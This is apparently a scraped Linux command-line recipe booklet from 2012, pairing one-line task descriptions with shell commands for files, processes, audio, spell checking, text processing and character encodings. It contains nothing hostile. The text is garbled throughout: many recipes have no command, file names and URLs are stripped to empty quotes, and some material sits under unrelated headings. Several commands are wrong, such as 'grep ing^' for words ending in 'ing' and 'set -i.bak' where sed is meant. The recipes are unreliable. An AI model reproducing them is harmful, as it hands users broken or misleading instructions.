The Linux Operating System

Table of Contents

last revision
09 March 2012, 1:55pm
book quality


Quote: "I'm doing a (free) operating system, just a hobby,..." (Linus Torvalds)

This booklet is designed to help with common tasks on a Linux system. It is designed to be presentable as a series of "recipes" for accomplishing common tasks. These recipes consist of a plain English one-line description, followed by the Linux command which carries out the task. The document is focused on performing tasks in Linux using the 'command line' or 'console'. The format of the booklet was largely inspired by the "Linux Cookbook"

a good list of resources
some command lines recipes
some command line recipes
a very good site with lots of command-line tips
A very good Linux User "cookbook" and the primary inspiration for the booklets on this site.

Good Books ‹↑›

www: The
UNIX Environment (Andrew Walker, Wiley 1984)
www: The
Linux Cookbook (Michael Stutz, No Starch Press)
www: The
Unix Programming Environment (Kernighan et al)

Online Books ‹↑›

a philosophical book about the unix operating system by Eric Raymond (2003)
a list of online linux books

Getting Help ‹↑›

The traditional Unix help system is called 'man' or 'manual' pages. And they can be good. It is one of the ironies and frustrations of Unix that a man page only really becomes helpful and interesting once one already knows what a program does and how to basically use it.

show the short help description for all programs

 whatis -r '.*'
 for i in $(ls $(echo $PATH | tr ':' ' ')); do whatis $i; done | less

search for all programs which have something to do with 'java'

 whatis -r '.*' | grep java
 whatis -r 'java'
 whatis -r java

view the 'manual' page for the wc (word/line/character count) command

 man wc

Sadly, 'man' pages are often written in a cryptic way and are short on examples. The examples, if there are any, are almost always right at the end of the man page.

view the manual page in 'section' 4. See the list of sections, elsewhere

 man 4 command

show what software is available to install, relating to 'page layout'

 apt-cache search "page layout"
 apt-cache search "page layout" | grep -v '^lib'  exclude code libraries)

Search all man pages for the word 'dig'

 man -k dig  does this search just the short description??

find documentation for latex packages in pdf format

 find /usr/share/doc/ -name '*.pdf'    on a debian system, at least

An Introduction To The Linux Command Line ‹↑›

Unix Culture Shock ‹↑›

Those users who have no experience with a Unix-style operating system, but are familiar with the Microsoft Windows operating system will experience a kind of 'culture shock' when they begin to use Linux. This is true even if the user is familiar with using the 'command-line' on a Microsoft computer. This section attempts to point out some of the things which may seem baffling and illogical to the new Linux user.

www: You
cant just download an 'exe' and click on it to run it However you can easily install new software with 'sudo apt-get install <program-name>'
www: file
names dont have to have extensions (such as .txt), but can To an experienced Microsoft command line user, the idea of just calling a text file 'report' rather than 'report.txt' is rather disorientating. "How will the computer know what type of file it is?" The microsoft user thinks. File names can and do begin with a dot '.' File names can begin with a tilde '~'
www: Linux
commands are very short and cryptic Why is the 'list files' command, called 'ls' and not 'list'? It would be so much more memorable as 'list' than 'ls'. This is the "Unix way". If you like typing you can do alias list='ls'
www: The
folder hierarchy in Linux seems very cryptic and you cant just put files anywhere

Basic User Commands ‹↑›

log in to the system with a username of 'bob'

 ubuntu login: bob

log out of the system


switch to the fourth virtual console

 press [ALT]-[F4]

switch from the fourth to the third virtual console, press:


switch from X to the first virtual console, press:


run the hostname tool to find the name of the computer


output the version of the hostname tool

 hostname --version

run hostname and specifying that the file '' be read from

 hostname -F

change your password


output your username


see who is currently logged in


see who is currently logged in and what they are doing


display information about recent use of the system

 last | less

find out when the user 'mjb' last logged in

 last mjb

NOTE: The last tool gets its data from the system file '/var/log/wtmp'; the last line of output tells how far this file goes back.

Basic Process Commands ‹↑›

list the processes in your current shell session


list all the processes that user 'hst' has running on the system

 ps -u hst

This command is useful for listing all of your own processes

list all of the processes and give their user-names

 ps aux  there could be a lot of output, even on single user systems

display a continually updated display of the current system processes


list all the processes containing a reference to an 'sbin' directory

 ps aux | grep sbin

list any processes whose process IDs contain a 13 in them

 ps aux | grep 13

list the process whose PID is 344

 ps -p 344

Basic Software Commands ‹↑›

Run skype using your GTK theme

 skype --disable-cleanlooks -style GTK

output a list of programs that pertain to consoles

 apropos consoles

output a list of all tools whose pages in the system manual contain a reference to consoles

 man -k consoles

list all of the software packages installed on the system

 dpkg -l

list all of the packages whose name or description contains the text "edit," regardless of case

 dpkg -l | grep -i edit

peruse descriptions of the packages that are available

 less /var/lib/dpkg/available

get a description of the who tool

 whatis who

view the manual page for w

 man w

view all of the Info manuals on the system


read the Info documentation for the tar tool

 info tar

This command opens a copy of The GNU tar Manual in info. To read the contents of a file written in Info format, give the name of

read '', an Info file in the current directory

 info -f

read '', an Info file in the current directory, beginning with the node Text

 info -n 'Text' -f

view the HTML version of the Debian FAQ in the lynx Web browser

 lynx /usr/share/doc/debian/FAQ/debian-faq.html

The above only works on a Debian flavour of Linux.

view the compressed text version of the Debian FAQ in zless,

 zless /usr/doc/debian/FAQ/debian-faq.txt.gz

Basic Command Line Usage ‹↑›

repeat the last command entered


The [^|] key moves the last command you typed back to the input line, and executes it.

retrieve the last command you entered with the string 'grep' in it

 <control-r>   press the <control> key and the 'r' key
(reverse-i-search)'': grep

put the 3rd-last command you entered with 'grep' in it on the input line

(reverse-i-search)'': grep

clear the screen and then log out of the system

 clear; logout

run the hostname command twice times

 hostname; hostname

redirect standard input for apropos to file 'keywords'

 apropos < keywords

redirect standard output of a command to the file 'commands'

 apropos shell bash > commands

append the standard output of apropos shells to the file 'commands'

 apropos shells >> commands

redirect the standard error of apropos shell bash to 'command.error'

 apropos shell bash 2> command.error

perform a long task in the background, saving all messages to 'img.txt'

 find / | xargs file | grep image &>~/img.txt &

In the command above, both error messages (2>) and all normal output of the command will be redirected to the 'img.txt' text file in the users home folder.

append the error output of a command to an existing file 'command.error'

 apropos shells 2>> command.error

redirect the standard output and standard error to the file 'commands'

 apropos shells &> commands

view the output of "apropos bash shell shells" in a 'pager' program

 apropos bash shell shells | less

A pager program allows you to view output from a program one (screen) page at a time. (pagers: more/less/most)

run the command apropos shell > shell-commands as a background job

 apropos shell > shell-commands &

run job 4 in the background

 bg %4

Trivia: running a job in the background is sometimes called "backgrounding" or "amping off" a job.

bring the most recent background job to the foreground


bring job 3 to the foreground

 fg %3

list your jobs


kill job number 2

 kill %2

to interrupt a running command use [control] c

 find / -name '*e*'
 [control] c

search your command history for the text 'apropos'

 history | grep apropos

specify the second-to-the-last command in your history

 [^|] [^|]

Trivia: '!', the exclamation mark is sometimes called "bang"

run history event number 1 (the last command executed)


create a script of a shell session and save it to the file 'log.1'

 script log.1

Simple File Commands ‹↑›

create the file 'new.txt' in the current directory

 touch new.txt

create the file 'new' in the 'work/docs' subdirectory of the current directory

 touch work/docs/new

On a Unix-style computer, such as Apple OSX or Linux, files do not have to have 'extensions' to their names, unlike on Microsoft Windows.

make a new directory called 'work' in the current working directory

 mkdir work

create the 'work/completed/2001' directory

 mkdir -p work/completed/2001
 mkdir --parents work/completed/2001    the same

If the 'work' and 'completed' folders do not exist, then they will be created.

Simple Folder Commands ‹↑›

change the current working directory to '/usr/doc'

 cd /usr/share/doc

return to the directory you were last in

 cd -

determine what the current working directory is


list the contents of 'work', a subdirectory in the current directory

 ls work

list the contents of the '/usr/doc' directory

 ls /usr/doc

list the contents of the directory so that directories and executables are distinguished from other files

 ls -F

output a verbose listing of the '/usr/doc/bash' directory

 ls -l /usr/doc/bash

output a recursive listing of the current folder and sub-folders

 ls -R

list all of the files on the system

 ls -R /

list the files in the 'log' directory sorted with newest first

 ls -t /var/log

The '/var/log' folder usually contains 'log' files which record the activities of software running on the computer. Type 'man hier' for more information about the Linux folder structure.

list all files in the current directory (including 'hidden' files)

 ls -a

output a tree graph of your home directory and all its subdirectories

 tree ~       this shows files as well as folders

show a just the start of a folder tree for the home folder

 tree -d /usr/local | head -20

[>>0.3 image/eg-tree.png]

peruse a tree graph of the '/usr/local' directory tree

 tree -d /usr/local | less

Copying Files ‹↑›

copy the file 'old' to the file `new'

 cp old new

copy files preserving the file attributes

 cp -p file.txt new-copy.txt

copy the folder 'reports' verbosely (showing what is being done)

 cp -vr reports ~/new/

copy a folder tree verbosely, but only copy files which are newer

 cp -vur docs/office ~/docs

copy the folder 'public_html', and subfolders, to 'private_html'

 cp -R public_html private_html

The cp '-R' option doesnt copy symbolic links. But the "man" page for cp states that -r and -R are equivalent

make an archive copy of the directory tree 'public' to 'private'

 cp -a public_html private_html

Moving Files ‹↑›

move the file 'notes' in the current working directory to '../play'

 mv notes ../play

move the file '/usr/tmp/notes' to the current working directory,

 mv /usr/tmp/notes .

This command moves the file '/usr/tmp/notes' to the current working

move the directory 'work' in the current working directory to 'play'

 mv work play

rename the file 'notes' to `notes.old'

 mv notes notes.old

NOTE: to rename multiple files use 'rename'

Deleting Files ‹↑›

remove the file 'notes' in the current working directory

 rm notes

remove the directory 'waste' and all of its contents

 rm -R waste

remove the directory 'empty'

 rmdir empty

use tab completion to remove the file 'No Way' in the current directory

 rm No[TAB] Way

delete the file '^Acat' in a directory that also contains the files 'cat' and `dog'

 rm -i ?cat   rm: remove '^Acat'? y 

remove the file '-cat' from the current directory

 rm -- -cat

Symbolic Links ‹↑›

create a hard link from 'seattle' to `emerald-city'

 ln seattle emerald-city

create a symbolic link from 'seattle' to `emerald-city'

 ln -s seattle emerald-city

list all files in the '/usr/bin' directory that have the text 'tex' anywhere in their name

 ls /usr/bin/*tex*

copy all files whose names end with '.txt' to the `doc' subdirectory

 cp *.txt doc

output a verbose listing of all files whose names end with either a '.txt' or '.text' extension, sorting the list so that newer files are listed first

 ls -lt *.txt *.text

remove all files in the current working directory that begin with a hyphen and have the text 'out' somewhere else in their file name

 rm -- -*out*

join text files whose names have an 'a' followed by 2 or more characters

 cat a??*

The original files are unchanged, but the joined together text files are displayed on the screen.

The Bash Prompt ‹↑›

change your shell prompt to 'Your wish is my command: '

 PS1='Your wish is my command: '

change your prompt to the default bash prompt (the current folder)

 PS1='\w $ '

change the prompt to the current date, space, the hostname, and a '>'

 PS1='\d (\h)>'

clear the screen every time you log out,

  clear     put this in the file '.bash_logout'

Installing Software ‹↑›

search for games software which are available to install

 apt-cache search game

update the repository cache

 sudo apt-get update

Add new repositories to the file '/etc/apt/sources.list'

Sound ‹↑›

A linux system is capable of playing, recording and editing sound (audio) files with a variety of open-source software. This section only provides what should be a very succint overview of the most important sound tasks with linux. For more detailed information, please consult the booklet listed below.

A more comprehensive introduction to using audio with the linux operating system.
Synthesize text as speech
 echo "hello world " | festival --tts

find the duration of the audio file 's.wav' in hours/minutes/seconds

 soxi -d s.wav
 soxi s.wav | grep -i duration   the same

Recording Audio ‹↑›

record a 'wav' file from the microphone, saving it to 'hello.wav'

 rec hello.wav

This begins an 8,000 Hz, monaural 8-bit WAV recording, which is not very good quality.

make a high-fidelity recording from the mic and save it to 'goodbye.wav'

 rec -s w -c 2 -r 44100 goodbye.wav
 rec -s w -c 2 -r 44100 goodbye.wav

Playing Audio ‹↑›

play the MP3 stream at the url


Converting Audio File Formats ‹↑›

It is a common task to need to convert sound files from one format to another.

translate an audio file in Sun AU format to a Microsoft WAV file,

 sox recital.wav

convert 'sound.mp3' into a wav file 'new.wav' (a new file is created)

 mpg321 -w new.wav old.mp3   the file 'old.mp3' is unchanged
 mpg123 -w new.wav old.mp3   the same

encode an MP3 file from a WAV file called 'september-wind.wav'

 lame september-wind.wav september-wind.mp3

Editing Sound ‹↑›

important 'ls' options
-a - display all files including hidden ones
-F - display the file types of files
-R - list all folders and subfolders
-t - sort the displayed files by date

join the audio files 'a.wav' and 'b.wav' together and save as 'new.wav'

 sox a.wav b.wav new.wav

Converting Audio Files ‹↑›

Translation ‹↑›

tools for editing sound
audacity - a good graphical sound editor
sox - a command line audio editor

Unicode ‹↑›

Find UTF-8 text files misinterpreted as ISO 8859-1 due to Byte

 find . -type f | grep -rl $'\xEF\xBB\xBF'

show the current locale (language and character encoding)


show a hexdump of a text file

 hd file.txt
 hexdump file.txt    #(the format is a little different)

Text File Encodings ‹↑›

Convert a file from ISO-8859-1 (or whatever) to UTF-8 (or

 tcs -f 8859-1 -t utf /some/file

Convert filenames from ISO-8859-1 to UTF-8

 convmv -r -f ISO-8859-1 -t UTF-8 --notest *

Detect encoding of the text file 'file.txt'

 file -i file.txt  -i is the 'mime' switch, but it also shows encoding

convert file from utf8 (no bom) to utf16 (with 'bom')

 recode UTF8..UTF-16LE linux-utf8-file.txt

convert all '.php' files to the utf-8 text encoding

 find . -name "*.php" -exec iconv -f ISO-8859-1 -t UTF-8 {} -o ../newf/{} \;

find utf-8 encoded text files misinterpreted as iso 8859-1

translation tools
youtranslate - uses web services such as google

Fix UTF-8 text files misinterpreted as ISO 8859-1 due to Byte

 perl -i -pe 's/\xef\xbb\xbf//g' <file>

Convert file type to unix utf-8

 ex some_file "+set ff=unix fileencoding=utf-8" "+x"

Convert one file from ISO-8859-1 to UTF-8.

 iconv --from-code=ISO-8859-1 --to-code=UTF-8 iso.txt > utf.txt

Spell Checking ‹↑›

 find -type f | while read a;do [ "`head -c3 -- "${a}"`" == $'\xef\xbb\xbf' ] && echo "match: ${a}";done

spell checking programs
spell a non interactive spell checker
ispell a veteran program
aspell the gnu version
myspell the open-office spell checker
hunspell based on ispell
spellutils debian package to selectively spell check

search for all debian packages which have something to do with spelling

 apt-cache search spell

spell check the file 'lecture'

 spell lecture

prints a list of badly spelled words

print all misspelled words in all ".txt" files with line numbers

 spell -n -o *.txt

spell check the file 'ch.1.txt', with misspellings to the file 'bad.sp'

 spell ch.1.txt > bad.sp

check the spelling of a word on the command line

 echo 'is this korrect ?' | spell

This prints 'Korrect' since it is badly spelled

output a sorted list of the misspelled words from 'lecture.draft'

 spell lecture.draft | sort | uniq

Ispell ‹↑›

'ispell' is an older and simpler program than 'aspell'

interactively spell check 'report.txt'

 ispell report.txt

install a British English dictionary for the "ispell" spell checker

 sudo apt-get install ibritish

check and correct the spelling interactively in document "report.txt"

 ispell report.txt
when a misspelling is found, type the number of the replacement

spell check "file.txt" using a british english dictionary

 ispell -d british file.txt

spell check a document written in spanish (using a spanish dictionary)

 ispell -d spanish archivo.txt

show what dictionaries are available locally for ispell

 ls /usr/lib/ispell/

the ispell dictionaries are all called "i[language-name]"

 dictionary files: icatalan, ibrazilian ...

spell check and correct "thesis.tex" which is a LaTeX format document

 ispell -t thesis.tex  ispell ignores the latex mark-up codes

Aspell ‹↑›

aspell is a more modern and capable spell checking program

the official site
A usage manual for aspell
show options for aspell and available dictionaries
 aspell help | less

show locally available dictionaries for aspell

 aspell dicts

install a British and American English dictionary for aspell

 sudo apt-get install aspell-en

install a spanish dictionary for aspell

 sudo apt-get install aspell-es

show all debian packages and dictionaries for aspell

 apt-cache search aspell

interactively check the spelling of the file "chapter.txt"

 aspell -c chapter.txt
 aspell check chapter.txt      the same

Aspell With Other Languages ‹↑›

check the spelling of "chapter.txt" using British English spelling

 aspell -d british -c chapter.txt
 aspell -d en_GB -c chapter.txt   this is the same

check the spelling of "chapter.txt" using a Spanish dictionary

 aspell -d spanish -c chapter.txt
 aspell -d es -c chapter.txt   this is the same

check spelling in the comments in the shell script (lines starting with "#")

 aspell --mode=comment -c  !!doesnt work on my version

checking the spelling in the tex/latex file "chapter.tex"

 aspell -t -c chapter.tex

show available filters for spell-checking particular types of files

 aspell filters
 aspell dump filters   the same

spell check a file skipping (ignoring) lines which start with '>'

 aspell --mode=email check book.txt
 aspell --mode=email -c book.txt    the same
 aspell -e -c book.txt

create a vim "mapping" to use aspell within vim

 map TT :w!<CR>:!aspell check %<CR>:e! %<CR>

spell check a file but only between a "*" character and the end of the line

 aspell --add-filter=context --add-context-delimiters="* \0" -c francisco.txt
doesnt really work

Text Files ‹↑›

Viewing Text Files ‹↑›

editors with spell checking
vim type ':set spell' to activate, and 'z=' to correct

To print a specific line from a file

text file viewing tools
less - a text file pager
most - a more capable pager

set the default pager to be the 'most' program

 update-alternatives --set pager /usr/bin/most

View non-printing characters with cat

 cat -v -t -e

See non printable characters like tabulations, CRLF, LF line

 od -c <FILE> | grep --color '\\.'

Less ‹↑›

the homepage for less
The humble 'less' program is worthy of a second look. Less allows one to peruse and search a text file, but not alter it. I am documenting version 429 (year 2008). Less uses vi-like keys to move around and search.

view the text file 'doc.txt' one screen page at a time

 less doc.txt

view the text file 'days.txt' starting at the end

 less +G days.txt

 awk 'FNR==5' <file>

some common 'less' commands
[space-bar] - forward one window
[esc] + [space-bar] - forward one window (with multiple files)
b - back one window
j - down one line (the same as 'vim')
k - up one line (the same as 'vim')
F - go to end of file and 'follow' new data (like tail -f)
G - go to the last line of the file
g - go to the first line of the file
/pattern - Search forward for (N-th) matching line.
?pattern - Search backward for (N-th) matching line.
n - Repeat previous search (for N-th occurrence).
N - Repeat previous search in reverse direction.
ESC-n - Repeat previous search spanning files.
v - edit the current file with $VISUAL or $EDITOR

Starting Less ‹↑›

view the file 'long.txt' and make searches within less case-insensitive

 less -I long.txt

view the file 'long.txt', with 'semi' case-insensitive searching

 less -i long.txt  searches with capital letters are case-sensitive

make an alias which will make less always semi case-insensitive

 alias less='less -i'

within less turn on or off case-insensitive searching

 -I [enter]

within less see whether searches are case-sensitive or not


view the output of 'grep' starting at the first line which has 'science' in it

 grep tree forest.txt | less +/science

follow the end of the log file 'tcp.log' showing new data as it enters

 less +F tcp.log   this is like 'tail -f' but allows more perusal

Search for a word in less


go to the 80% position in the file (that is, 80% towards the end)


display less commands


Less With Multiple Files ‹↑›

search multiple files for the text 'tree'

 less *.txt (then type) /*tree

Less Bookmarks ‹↑›

Less bookmarks work in the same way as 'vi' or 'vim' bookmarks

mark the current top-of-screen position in the text file as bookmark 'x'

 mx     any single letter can be used as a bookmark

jump to the bookmark x


save text from current top-of-screen to the bookmark 'x' in file 'save.txt'

 |x cat > save.txt

jump to where you just were (before going to a bookmark)


edit the current file (but the variable $EDITOR or $VISUAL must be set)


Analysing Language ‹↑›

Dictionaries ‹↑›

Look up the definition of a word

 curl dict://

Wordnet ‹↑›

get help for wordnet

 man wnintro
 man wn

show a list of word senses available for the word 'browse',

 wn browse -over

output a list of words from the dictionary that begin with the string 'homew'

 look homew  prints something like 'homeward' and `homework' ...

list words in the dictionary containing the string 'dont' regardless of case

 grep -i dont /usr/dict/words

list all words in the dictionary that end with 'ing'

 grep ing^ /usr/dict/words

list all of the words that are composed only of vowels

 grep -i '^[aeiou]*$' /usr/dict/words

output a list of words that rhyme with 'friend', search '/usr/dict/words' for lines ending with `end':

 grep 'end$' /usr/dict/words

search the WordNet dictionary for nouns that begin with 'homew'

 wn homew -grepn

search the WordNet dictionary for nouns and adjectives that begin with 'homew'

 wn homew -grepn -grepa

list the definitions of the word 'slope'

 wn slope -over

output all of the synonyms (same meaning) for the noun 'break'

 wn break -synsn

output all of the synonyms for the verb 'break'

 wn break -synsv

output all of the antonyms (opposite meaning) for the adjective 'sad'

 wn sad -antsa

A hypernym of a word is a related term whose meaning is more general

output all of the hypernyms for the noun 'cat'

 wn cat -hypen

Debian 'dict'

check file 'dissertation' for clichés or other misused phrases, type:

 diction dissertation | less

check file 'dissertation' for clichés or other misused phrases, and write the output to a file called 'dissertation.diction'

 diction dissertation > dissertation.diction

If you don't specify a file name, diction reads text from the standard

output all lines containing double words in the file 'dissertation'

 diction dissertation | grep 'Double word'

check the readability of the file 'dissertation'

 style dissertation

Like diction, style reads text from the standard input if no text is given

output all sentences in the file 'dissertation' whose ARI is greater than a value of 20

 style -r 20 dissertation

output all sentences longer than 14 words in the file 'dissertation'

 style -l 14 dissertation

output the number of lines, words, and characters in file 'outline'

 wc outline

output the number of characters in file ''

 wc -c

Use wc with the '-w' option to specify that just the number of words be

output the number of words in the file 'story'

 wc -w story

output the combined number of words for all the files with a '.txt' file name extension in the current directory

 cat *.txt | wc -w

output the number of lines in the file 'outline'

 wc -l outline

output a word-frequency list of the text file 'naked_lunch',

 tr ' ' '\n' < naked_lunch | sort | uniq -c

output a count of the number of unique words in the text file 'naked_lunch'

 tr ' ' '
> ' < naked_lunch | sort | uniq -c | wc -l

rank the files rep.a, rep.b, rep.c in order of relevance to keywords 'saving' and `profit'

 rel "(saving & profit)" report.a report.b report.c

output a list of any files containing either 'invitation' or 'request' in the `~/mail' directory, ranked in order of relevancy, type:

 rel "(invitation | request)" ~/mail

output a list of any files containing 'invitation' and not 'wedding' in the `~/mail' directory, ranked in order of relevancy, type:

 rel "(invitation ! wedding)" ~/mail

output a list of any files containing 'invitation' and 'party' in the '~/mail' directory, ranked in order of relevancy

 rel "(invitation & party)" ~/mail

Wrapping Text Lines ‹↑›

format a text file with lines 80 characters long,

 fmt -w 80 textfile   short lines lengthened
 fmt -s -w 80 textfile   short lines are not lengthened

use par instead

Splitting Text Files ‹↑›

split a file into a maximum of 10 files on lines containing '#200', '#400', '#600' etc with output files called "zz00", "zz01", etc

 csplit -f zz file.txt "/^#1?[24680]00$/" {8}
the split occurs 'before' the line containing the match

Merging Text Files ‹↑›

Concatenate lines of to files, one by one

 join file1.txt file2.txt > file3.txt

Merges given files line by line

 paste -d ',:' file1 file2 file3

Converting Other Formats To Text ‹↑›

convert from html to text

 lynx -dump http://url > textfile
 links-dump http://url > textfile may render tables
 w3m -dump http://url > textfile  may tables better

remove the newline characters from the text file 'autoexec.bat'

 fromdos autoexec.bat
 dos2unix autoexec.bat the same

add newline characters to all of '.tex' files in the current directory

 todos *.tex
 unix2dos *.tex the same

Converting Character Encodings ‹↑›

Convert encoding of given files from one encoding to another
 iconv -f utf8 -t utf16 /path/to/file

see also iconv (older)

show possible conversions with the 'recode' tool

 recode -l | less

convert latin9 (western europe) character encoding to utf8

 recode iso-8859-15..utf8 report.txt    the actual file is changed

convert from the local character set to the latin1 encoding saving to "new.txt"

 recode ..lat1 < file.txt > new.txt   the original file is unchanged

convert to html

 recode ..HTML < file.txt > file.html

convert from utf8 to html with verbose output

 recode -v u8..h < file.txt

convert from MS Windows utf8 to the local character set

 recode utf-8/CRLF.. file-to-change.txt

Comparing And Patching Text Files ‹↑›

The process of 'patching' a text or code file is very important in the world of open-source development (and therefore in the development of Linux itself). Patching allows non-linear changes to be made to a file and is usually used in conjuction with 'diff'

Use colordiff in side-by-side mode, and with automatic column

 colordiff -yW"`tput cols`" /path/to/file1 /path/to/file2

Compare a file with the output of a command or compare the output

 vimdiff foo.c <(bzr cat -r revno:-2 foo.c)

remote diff with side-by-side ordering.

 ssh $HOST -l$USER cat /REMOTE/FILE | sdiff /LOCAL/FILE -

Diff files on two remote hosts.

 diff <(ssh alice cat /etc/apt/sources.list) <(ssh bob cat /etc/apt/sources.list)

show lines that appear in both file1 and file2

 comm -1 -2 <(sort file1) <(sort file2)

find the extra lines in file2

 diff file1 file2 | grep ^>

find the extra lines in file1

 diff file1 file2 | grep ^<

Compare a remote file with a local file

 ssh user@host cat /path/to/remotefile | diff /path/to/localfile -

Generate diff of first 500 lines of two files

 diff <(head -500 product-feed.xml) <(head -500 product-feed.xml.old)

compare the files 'manuscript.old' and `'

 diff manuscript.old

peruse the files 'olive' and 'green' side by side indicating differences

 sdiff olive green | less

output a difference report for files 'tree', 'bush', and 'hedge',

 diff3 tree bush hedge > arbol

update the original file '' with the patchfile 'manuscript.diff'

 patch manuscript.diff

Colored diff ( via vim ) on 2 remotes files on your local

 vimdiff scp:// scp://

vimdiff to remotehost

 vimdiff <(ssh -A testserver "cat")

Searching Text ‹↑›

gnu grep special characters

  .. \< - matches beginning of a word
  .. \> -  matches the end of a word
  .. \b -  matches a word boundary
  .. [:upper:] - matches upper case letters (unicode)
  .. [:lower:] - matches lower case letters (unicode)
  .. [:space:] - matches space characters

00- the "--" sequence may be "escaped" in grep. for example: grep "\-\-" file.txt -

search interactively and ignoring case all '.txt' files in this folder

 cat *.txt | less -I   then type '/' to search
 less -I *.txt         then type '/*' to search, seems better

search for lines which begin with "#" in the text file "script"

 grep '^#' <script

display lines which begin with an uppercase letter or word in 'doc.txt'

 grep '^[[:upper:]]\+' doc.txt

display lines in 'doc.txt' which do not have any upper case letters in them

 grep '^[^[:upper:]]*$' doc.txt

search for lines which dont contain the word "the"

 grep -v the <file

show all lines which contain neither of the words "to" nor "green"

 egrep -v "tree|green" tree.txt

show the names of all files containing the word 'tree' (searches subfolders)

 find . | xargs grep -l "tree" the fastest way
 find | xargs grep -l "tree"   the dot doesnt seem important
 grep -l tree $(find .)        the same but not for lots of files
 grep -rl tree *               veeery sloow

show names of all files Not containing the word 'mall' (searches subfolders)

 find | xargs grep -L "mall"      matches mall, small, ...
 find | xargs grep -L "\<mall\>"  only matches 'mall'

show the number of lines in a file which start with the word "tree"

 grep "^ *big" book.txt | wc -l

search for "leaf" or "tree" ignoring the case of the words

 grep -i -e "leaf" -e "tree" *
 egrep -i "leaf|tree" *        the same
shows lines with the word "Leaf", "TREE", "trEE" etc

show all text files in the books folder which have more than 100 lines

 find books/ | xargs wc -l | sort -rn | awk '$1 > 100 {print $2}'

search for a pattern (regex) in all text files (ignoring binary files)

 find . -type f | perl -lne 'print if -T;' | xargs egrep "somepattern"

Find And Replace In Text Files ‹↑›

notes: turma ?? a graphical tool for search and replace

Single File ‹↑›

replace uppercase letters with lower case letters

 tr '[:upper:]' '[:lower:]' <file  handles international text

'squeeze' multiple spaces in the file "test.txt"

 tr -s ' ' test.txt
 tr -s '[:blank:]' test.txt  the same but better, handles all whitespace

change aaa for bbb and print each line

 perl -p -e 's/aaa/bbb/' test.txt     the file is not changed

replace "aaa" with "bbb" and print each line

 perl -pi -e 's/aaa/bbb/' test.txt    the file IS changed

With A Backup ‹↑›

replace the word "big" with "small" in .txt files backing up to .bak

 perl -p -i.bak -e 's/\bbig\b/small/g' *.txt

Multiple Files ‹↑›

Change string in many files at once and more.

 find . -type f -exec grep -l XXX {} \;|tee /tmp/fileschanged|xargs perl -pi.bak -e 's/XXX/YYY/g'

replace the word "big" with "small" in .txt files backing up to .bak

 perl -p -i.bak -e 's/\bbig\b/small/g' *.txt

recursive replacement of text in the current folder and subdirectories

 perl -p -i.bak -e 's/\bbig\b/small/g' $(grep -ril oldstring *)

change 'big' to 'BIG' in all '.txt' files in this folder and subfolders

 set -i.bak 's/big/BIG' $(find . -name '*.txt')
the files are edited 'in place' and backed up to '.txt.bak'

find .txt files inside a directory and replace every occurrance

 find . -name '*.txt' -exec sed -ir 's/this/that/g' {} \;

a find and replace within text-based files, to locate and rewrite

 find . -name "*.txt" | xargs perl -pi -e 's/old/new/g'

find and replace with vim 'argdo'

 vim *  ... etc

Analysing Text ‹↑›

get line number of all matches in a file

 awk '/match/{print NR}' file

Count the number of characters in each line of a file (??)

 awk '{cc[length]++}END{for(i in cc){printf("%d: %d\n", cc[i], i)}}'

show unique words and the number of times each word occurs

 tr -sc [A-Z][a-z] [\012*] < file.txt | sort | uniq -c | less ???

Count the number of lines in all files in this and subfolders

 wc -l $(find . -name *.php)

plot the frequency distribution of words from files

 cat *.txt | { printf "se te du\nplot '-' t '' w dots\n"; tr '[[:upper:]]' '[[:lower:]]' | tr -s [[:punct:][:space:]] '\n' | sort | uniq -c | sort -nr | head -n 100 | awk '{print $1}END{print "e"}'; } | gnuplot

Analysing Text Data ‹↑›

some less command line switches
-i - when searching within less ignore case, unless search has uppercase
-I - when searching within less ignore case.
-G - dont highlight matches when searching within less

tools to process text data
awk a very capable text data processing language
perl an even more capable language
cut a simple field based tool
sort sort lines of a text file
www: delimiter
This is a something which separate 2 field or marks the beginning or end of some data. If we have 2 numbers separated by a space character as in '23.2 200' then we say that the data is 'delimited' by spaces.
www: field
A field is a unit of data in a record. If we have data about people, then 3 fields may be a persons first name, second name and age. However the way that data is broken up into fields is subjective and option culturally dependent. Therefore there is no universally accepted data format
www: data
record a record is a set of data fields which relate to a particular entity. For example if we store data about people, then a record will contain data for one person. The way the record is stored is dependant upon the data format.
www: export
data The process of exporting data involves converting data to a particular format and saving it in a file or files.
www: import
data jargon
A small booklet about the awk language, also available as a pdf file.
a booklet about the perl language
The delimiter character for cut can only be a single character, as far as I am aware. If more processing power is needed then the reader should consider using awk, sed, or perl.

show the second "field" of each line with space delimited fields

 cut -d ' ' -f 2 data.txt

If any extra spaces are in the file, this will fail

with space separated fields, first get rid of unwanted spaces with sed

 sed -r 's/^\s+//; s/\s+/ /g' cgt.txt | cut -d' ' -f2
   if the data were
     spain 4 5    
     italy 11 5
     england 4 6
   then the output would be

show every comma delimited field except the second

 cut -d, -f 2 --complement list.txt
    if the content of 'list.txt' was
    then the output would be

show the 2nd field and all subsequent fields of a comma delimited file

 cut -d, -f2- data.csv

show the 1st, 2nd and 3rd fields

 cut -d, -f-3

show fields 2, 3 and 4

 cut -d, -f2-4

sort alphabetically on the 3rd field of the file ignoring initial blanks

 sort -k 3b

Extraction Data From Text ‹↑›

display all the urls from 'essay.txt' and select to open in browser

 urlview essay.txt

Tidying Text Files ‹↑›

see how many lines in a text file are consecutive and duplicate

 uniq -d file.txt | wc -l   this also counts duplicate blank lines

show all duplicated (consecutive) lines in a text file

 uniq -d file.txt

output the file 'paper' with 1 space between words and 2 after fullstops

 fmt -u paper

show the file 'term-paper' with multiple blank lines as only one blank line

 cat -s term-paper

display 'term-paper' with multiple blank lines removed and giving the text unified spacing between words

 cat -s term-paper | fmt -u | less

output the file 'term-paper' with lines up to 75 characters long

 fmt term-paper

output the file 'doc.txt' with lines up to 80 characters long

 fmt -w 80 doc.txt

wrap long lines in the file 'doc.txt' without disturbing special patterns

 par doc.txt

Stream Editing Text Files ‹↑›

'stream editing' or 'batch editing' text files refers to the process of modifying a text file without opening a text editor. In other words the text file is modified via a series of commands which are applied to a file or many files with a program such as sed, awk, perl, etc. This is very useful when a large number of modifications need to be made in many files and where those modifications are similar; For example where a persons name needs to be changed in a large number of files.

Randomize lines (opposite of | sort)

 random -f <file>

uniq for unsorted data

 awk '!_[$0]++{print}'

Add a line to a file using sudo

 echo "foo bar" | sudo tee -a /path/to/some/file

Remove duplicate entries in the file 'list.txt' without sorting.

 awk '!x[$0]++' list.txt

Sorting Text Data ‹↑›

